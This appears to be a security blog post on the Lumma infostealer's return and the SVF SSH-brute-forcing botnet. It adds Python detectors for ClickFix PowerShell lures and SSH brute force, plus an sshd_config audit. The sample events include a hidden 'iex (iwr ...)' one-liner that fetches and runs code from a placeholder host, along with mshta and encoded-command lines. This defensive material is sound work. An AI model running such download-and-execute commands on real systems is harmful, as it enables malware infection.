Cybercriminals do not disappear; they just change the way they attack. While the Lumma Infostealer recovered quickly after its takedown, the SVF Botnet shows a new level of danger by targeting Linux SSH servers. Here is WhiteHat's summary of two recent emerging threats.
1. Lumma Infostealer re-emerged strongly after the takedown
In May 2025, international law enforcement seized over 2,300 domains and part of the command-and-control (C2) infrastructure of Lumma Stealer, an information-stealing malware sold under the Malware-as-a-Service (MaaS) model.
However, only a few weeks later, researchers observed that Lumma had almost completely recovered, moving to new hosting infrastructure such as Selectel (Russia) to evade further takedowns and continuing to spread aggressively.
Photograph: Hfrance
Current main distribution channels include:
- Fake cracks/keygens promoted via malvertising and poisoned search results
- Fake CAPTCHA pages (ClickFix) that trick the user into pasting a PowerShell command which loads the malicious code directly into memory
- Fake GitHub repositories offering game cheats/cracks that carry Lumma payloads
- YouTube/Facebook videos that lead to sites hosting malicious code, sometimes via sites.google.com pages
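The ClickFix channel above is the one a defender can catch on the endpoint: the victim pastes a PowerShell one-liner that runs hidden, bypasses the execution policy, downloads a second stage and executes it in memory, and the process usually has an interactive parent (explorer.exe from the Win+R dialog, or a browser). The following is an added example, not code from the original article or from any Lumma analysis; it scores process-creation events from constructed sample data against indicator patterns whose list, weights and threshold are this example's own assumptions, not a published ruleset.

```python
import re
from dataclasses import dataclass, field

# Indicator patterns for ClickFix-style PowerShell one-liners (assumed weights).
INDICATORS = {
    "hidden_window":  (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    "policy_bypass":  (re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), 1),
    "download":       (re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I), 2),
    "in_memory_exec": (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    "encoded_cmd":    (re.compile(r"-e(?:ncodedcommand|nc|c)\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    "mshta_lolbin":   (re.compile(r"\bmshta(?:\.exe)?\b", re.I), 2),
    "remote_url":     (re.compile(r"https?://", re.I), 1),
}
# Parents that mean a human launched the command interactively (Run dialog, browser).
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

@dataclass
class Verdict:
    event_id: str
    score: int
    hits: list = field(default_factory=list)
    suspicious: bool = False

def score_event(event_id, parent, cmdline, threshold=4):
    """Sum indicator weights found in the command line; an interactive parent
    adds one point only when at least one indicator already matched."""
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(cmdline)]
    score = sum(INDICATORS[h][1] for h in hits)
    if hits and parent.lower() in INTERACTIVE_PARENTS:
        hits.append("interactive_parent")
        score += 1
    return Verdict(event_id, score, hits, score >= threshold)

def triage(events, threshold=4):
    """Return only the events that cross the threshold, in input order."""
    verdicts = (score_event(e["id"], e["parent"], e["cmdline"], threshold) for e in events)
    return [v for v in verdicts if v.suspicious]

# Constructed process-creation events (parent image + command line); not real telemetry.
SAMPLE_EVENTS = [
    {"id": "evt-1", "parent": "explorer.exe",   # ClickFix paste from the Run dialog
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"iex (iwr 'http://example.invalid/verify.txt' -UseBasicParsing)\""},
    {"id": "evt-2", "parent": "cmd.exe",        # ordinary interactive use
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
    {"id": "evt-3", "parent": "svchost.exe",    # scheduled admin script, policy bypass alone is benign
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
    {"id": "evt-4", "parent": "explorer.exe",   # mshta variant of the same lure
     "cmdline": "mshta.exe https://example.invalid/captcha/verify"},
    {"id": "evt-5", "parent": "explorer.exe",   # hidden window plus encoded command
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
]

if __name__ == "__main__":
    for v in triage(SAMPLE_EVENTS):
        print(f"{v.event_id}: score={v.score} hits={','.join(v.hits)}")
```

The parent-process bonus is what separates a pasted lure from an administrator's scheduled script that legitimately uses `-ExecutionPolicy Bypass`; tune the threshold against your own baseline of PowerShell command lines before alerting on it.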
Lumma's strong re-emergence shows that MaaS platforms can recover very quickly unless a takedown is backed by stronger legal measures such as arrests or prosecution. It remains a worrying threat to users and businesses.
2. SVF Botnet – a new threat targeting Linux SSH servers
A new attack campaign is exploiting weakly configured Linux SSH servers to deploy the SVF botnet, a Python-based malware that lets attackers control the system remotely through Discord, a platform that is rarely monitored as a command-and-control channel.
Infection method: SVF Botnet brute-forces SSH credentials, installs its payload with an automated sequence of shell commands, takes commands over Discord, launches large-scale DDoS attacks, and can collect and manage proxies on its own to anonymise its traffic and increase attack effectiveness.
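The entry point described above, SSH brute force, leaves a clear trace in the server's authentication log long before the payload is dropped. The following is an added example, not code from the original article: it parses constructed OpenSSH `auth.log` lines (the same format `journalctl -u ssh` prints), counts failures per source address inside a sliding window, and raises a separate, higher-priority finding when a login succeeds from a source that just produced a burst of failures, which is what a brute force that worked looks like. The thresholds, window and the year assumed for the year-less syslog timestamps are this example's own choices.

```python
import re
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime

# Matches OpenSSH "Accepted/Failed <method> for [invalid user] <user> from <ip> port <n>" lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

@dataclass
class Event:
    ts: datetime
    accepted: bool
    method: str
    user: str
    ip: str

@dataclass
class Finding:
    kind: str
    ip: str
    user: str
    failures: int
    at: datetime

def parse_line(line, year=2025):
    """Syslog timestamps carry no year, so the caller supplies one (assumed here)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return Event(ts, m["result"] == "Accepted", m["method"], m["user"], m["ip"])

def detect(lines, threshold=5, window_s=60, success_after=3):
    """Flag a source once it reaches `threshold` failures inside `window_s` seconds,
    and flag every successful login from a source with >= `success_after` recent
    failures (a brute force that found a valid password)."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    already = set()               # ips already reported as brute-forcing
    findings = []
    for ev in filter(None, (parse_line(l) for l in lines)):
        q = recent[ev.ip]
        while q and (ev.ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if not ev.accepted:
            q.append(ev.ts)
            if len(q) >= threshold and ev.ip not in already:
                already.add(ev.ip)
                findings.append(Finding("brute_force", ev.ip, ev.user, len(q), ev.ts))
        elif len(q) >= success_after:
            findings.append(Finding("success_after_failures", ev.ip, ev.user, len(q), ev.ts))
    return findings

# Constructed sample log (documentation addresses, not a real capture).
SAMPLE_AUTH_LOG = """\
Jun 12 03:14:01 web1 sshd[2201]: Failed password for root from 198.51.100.23 port 41022 ssh2
Jun 12 03:14:03 web1 sshd[2203]: Failed password for invalid user admin from 198.51.100.23 port 41030 ssh2
Jun 12 03:14:05 web1 sshd[2205]: Failed password for invalid user ubuntu from 198.51.100.23 port 41038 ssh2
Jun 12 03:14:08 web1 sshd[2207]: Failed password for root from 198.51.100.23 port 41046 ssh2
Jun 12 03:14:12 web1 sshd[2209]: Failed password for invalid user test from 198.51.100.23 port 41054 ssh2
Jun 12 03:14:16 web1 sshd[2211]: Failed password for root from 198.51.100.23 port 41062 ssh2
Jun 12 03:14:20 web1 sshd[2213]: Accepted password for root from 198.51.100.23 port 41070 ssh2
Jun 12 03:14:20 web1 sshd[2213]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Jun 12 03:20:11 web1 sshd[2300]: Accepted publickey for deploy from 203.0.113.8 port 50112 ssh2
Jun 12 03:21:00 web1 sshd[2310]: Failed password for alice from 203.0.113.9 port 50200 ssh2
Jun 12 03:21:07 web1 sshd[2312]: Accepted password for alice from 203.0.113.9 port 50200 ssh2
""".splitlines()

if __name__ == "__main__":
    for f in detect(SAMPLE_AUTH_LOG):
        print(f"{f.at:%H:%M:%S} {f.kind:<24} {f.ip} user={f.user} failures={f.failures}")
```

A single mistyped password followed by a success (alice) produces nothing, while the six rapid failures and then `Accepted password for root` from 198.51.100.23 produce both findings; the second one is the case to page on, because the server is already compromised at that point.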
Dangerous features of the SVF bot:
- Large-scale DDoS support using HTTP flood (Layer 7) and UDP flood (Layer 4) techniques.
- Automatically collects proxies from public sites, verifies them, and routes attack traffic through them to hide the true source.
- Discord remote-control interface: lets the operator send commands, manage infected machines, tune attack parameters, and update or remove bots remotely, even without technical expertise.
Danger level:
- The code updates itself, and new functionality is easy to add because it is written in Python.
- It is hard to detect because it uses a popular, legitimate platform (Discord) as its C2 channel, so its traffic blends in with normal use.
- Persistent attacks on weakly configured SSH servers point to an urgent need to harden Linux infrastructure.
Recommendations for protecting Linux servers:
- Use strong, unique passwords, and disable password login in favour of key-based authentication wherever possible.
- Restrict SSH access to trusted IP addresses only (via the firewall).
- Update the operating system and software regularly to patch vulnerabilities.
- Monitor SSH logs and deploy an intrusion detection system (IDS).
- Disable unnecessary services to reduce the attack surface.
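The first recommendation above is applied in `sshd_config`, and it is easy to get wrong: sshd uses the first value it sees for a keyword, so a `PasswordAuthentication no` appended below an existing `yes` changes nothing, and `KbdInteractiveAuthentication` (formerly `ChallengeResponseAuthentication`) must also be off or PAM will still prompt for a password. The following is an added example, not code from the original article: a small audit that parses a constructed weak config and a constructed hardened one with sshd's first-value-wins rule and reports deviations from a baseline. The baseline thresholds (MaxAuthTries of 3, requiring AllowUsers/AllowGroups) are this example's assumptions; the OpenSSH defaults table reflects current OpenSSH behaviour, and Match blocks are deliberately skipped because their values apply conditionally.

```python
import re
from dataclasses import dataclass

# Constructed sshd_config fragments for illustration (not taken from a real host).
SSHD_CONFIG_WEAK = """\
# Weak: root may log in with a password, and password logins are allowed
Port 22
PermitRootLogin yes
PasswordAuthentication yes
MaxAuthTries 10
# Appended later in the belief that it fixes the problem; sshd ignores it
# because the first value seen for a keyword wins (sshd_config(5)).
PasswordAuthentication no
"""

SSHD_CONFIG_HARDENED = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
KbdInteractiveAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3
LoginGraceTime 30
AllowUsers deploy
"""

# OpenSSH defaults for the keywords checked, used when a keyword is absent.
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "kbdinteractiveauthentication": "yes",
    "pubkeyauthentication": "yes",
    "maxauthtries": "6",
}

# "Keyword value" or "Keyword=value"; sshd accepts both forms.
KEYWORD_RE = re.compile(r"^([A-Za-z]+)\s*=?\s*(.*)$")

def parse_sshd_config(text):
    """Effective value per keyword (lower-cased). First occurrence wins, as in
    sshd. Parsing stops at the first Match block, whose values only apply when
    the block's conditions match and so need per-host evaluation."""
    values = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEYWORD_RE.match(line)
        if not m:
            continue
        key, val = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            break
        if key == "challengeresponseauthentication":   # pre-8.7 name of the same option
            key = "kbdinteractiveauthentication"
        values.setdefault(key, val)
    return values

@dataclass
class Finding:
    keyword: str
    actual: str
    expected: str

def audit(text):
    """Compare the effective config against an assumed hardening baseline."""
    cfg = parse_sshd_config(text)
    get = lambda k: cfg.get(k, DEFAULTS.get(k, "")).lower()
    findings = []
    if get("permitrootlogin") not in ("no", "prohibit-password"):
        findings.append(Finding("PermitRootLogin", get("permitrootlogin"), "no"))
    if get("passwordauthentication") != "no":
        findings.append(Finding("PasswordAuthentication", get("passwordauthentication"), "no"))
    # PAM keyboard-interactive still prompts for a password unless disabled too.
    if get("kbdinteractiveauthentication") != "no":
        findings.append(Finding("KbdInteractiveAuthentication", get("kbdinteractiveauthentication"), "no"))
    if get("pubkeyauthentication") != "yes":
        findings.append(Finding("PubkeyAuthentication", get("pubkeyauthentication"), "yes"))
    if int(get("maxauthtries") or 0) > 3:
        findings.append(Finding("MaxAuthTries", get("maxauthtries"), "<= 3"))
    if "allowusers" not in cfg and "allowgroups" not in cfg:
        findings.append(Finding("AllowUsers/AllowGroups", "(unset)", "restrict to named accounts"))
    return findings

if __name__ == "__main__":
    for name, text in (("weak", SSHD_CONFIG_WEAK), ("hardened", SSHD_CONFIG_HARDENED)):
        print(name, [f"{f.keyword}={f.actual} (want {f.expected})" for f in audit(text)])
```

Run the audit against the output of `sshd -T`, which prints the fully resolved effective configuration, rather than against the raw file alone, so that values pulled in by `Include` directives are covered as well.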
SVF Botnet shows that botnets of the new era are no longer restricted to Windows. Linux has also become an attractive target, and any poorly configured SSH system can become a tool in global DDoS attacks.
Summary
Both the Lumma Infostealer and the SVF botnet show an increasingly sophisticated malware trend that is difficult to suppress despite legal and technical measures. This underscores the importance of multi-layered security combined with continuous monitoring and timely response to protect systems in the era of modern MaaS and botnets.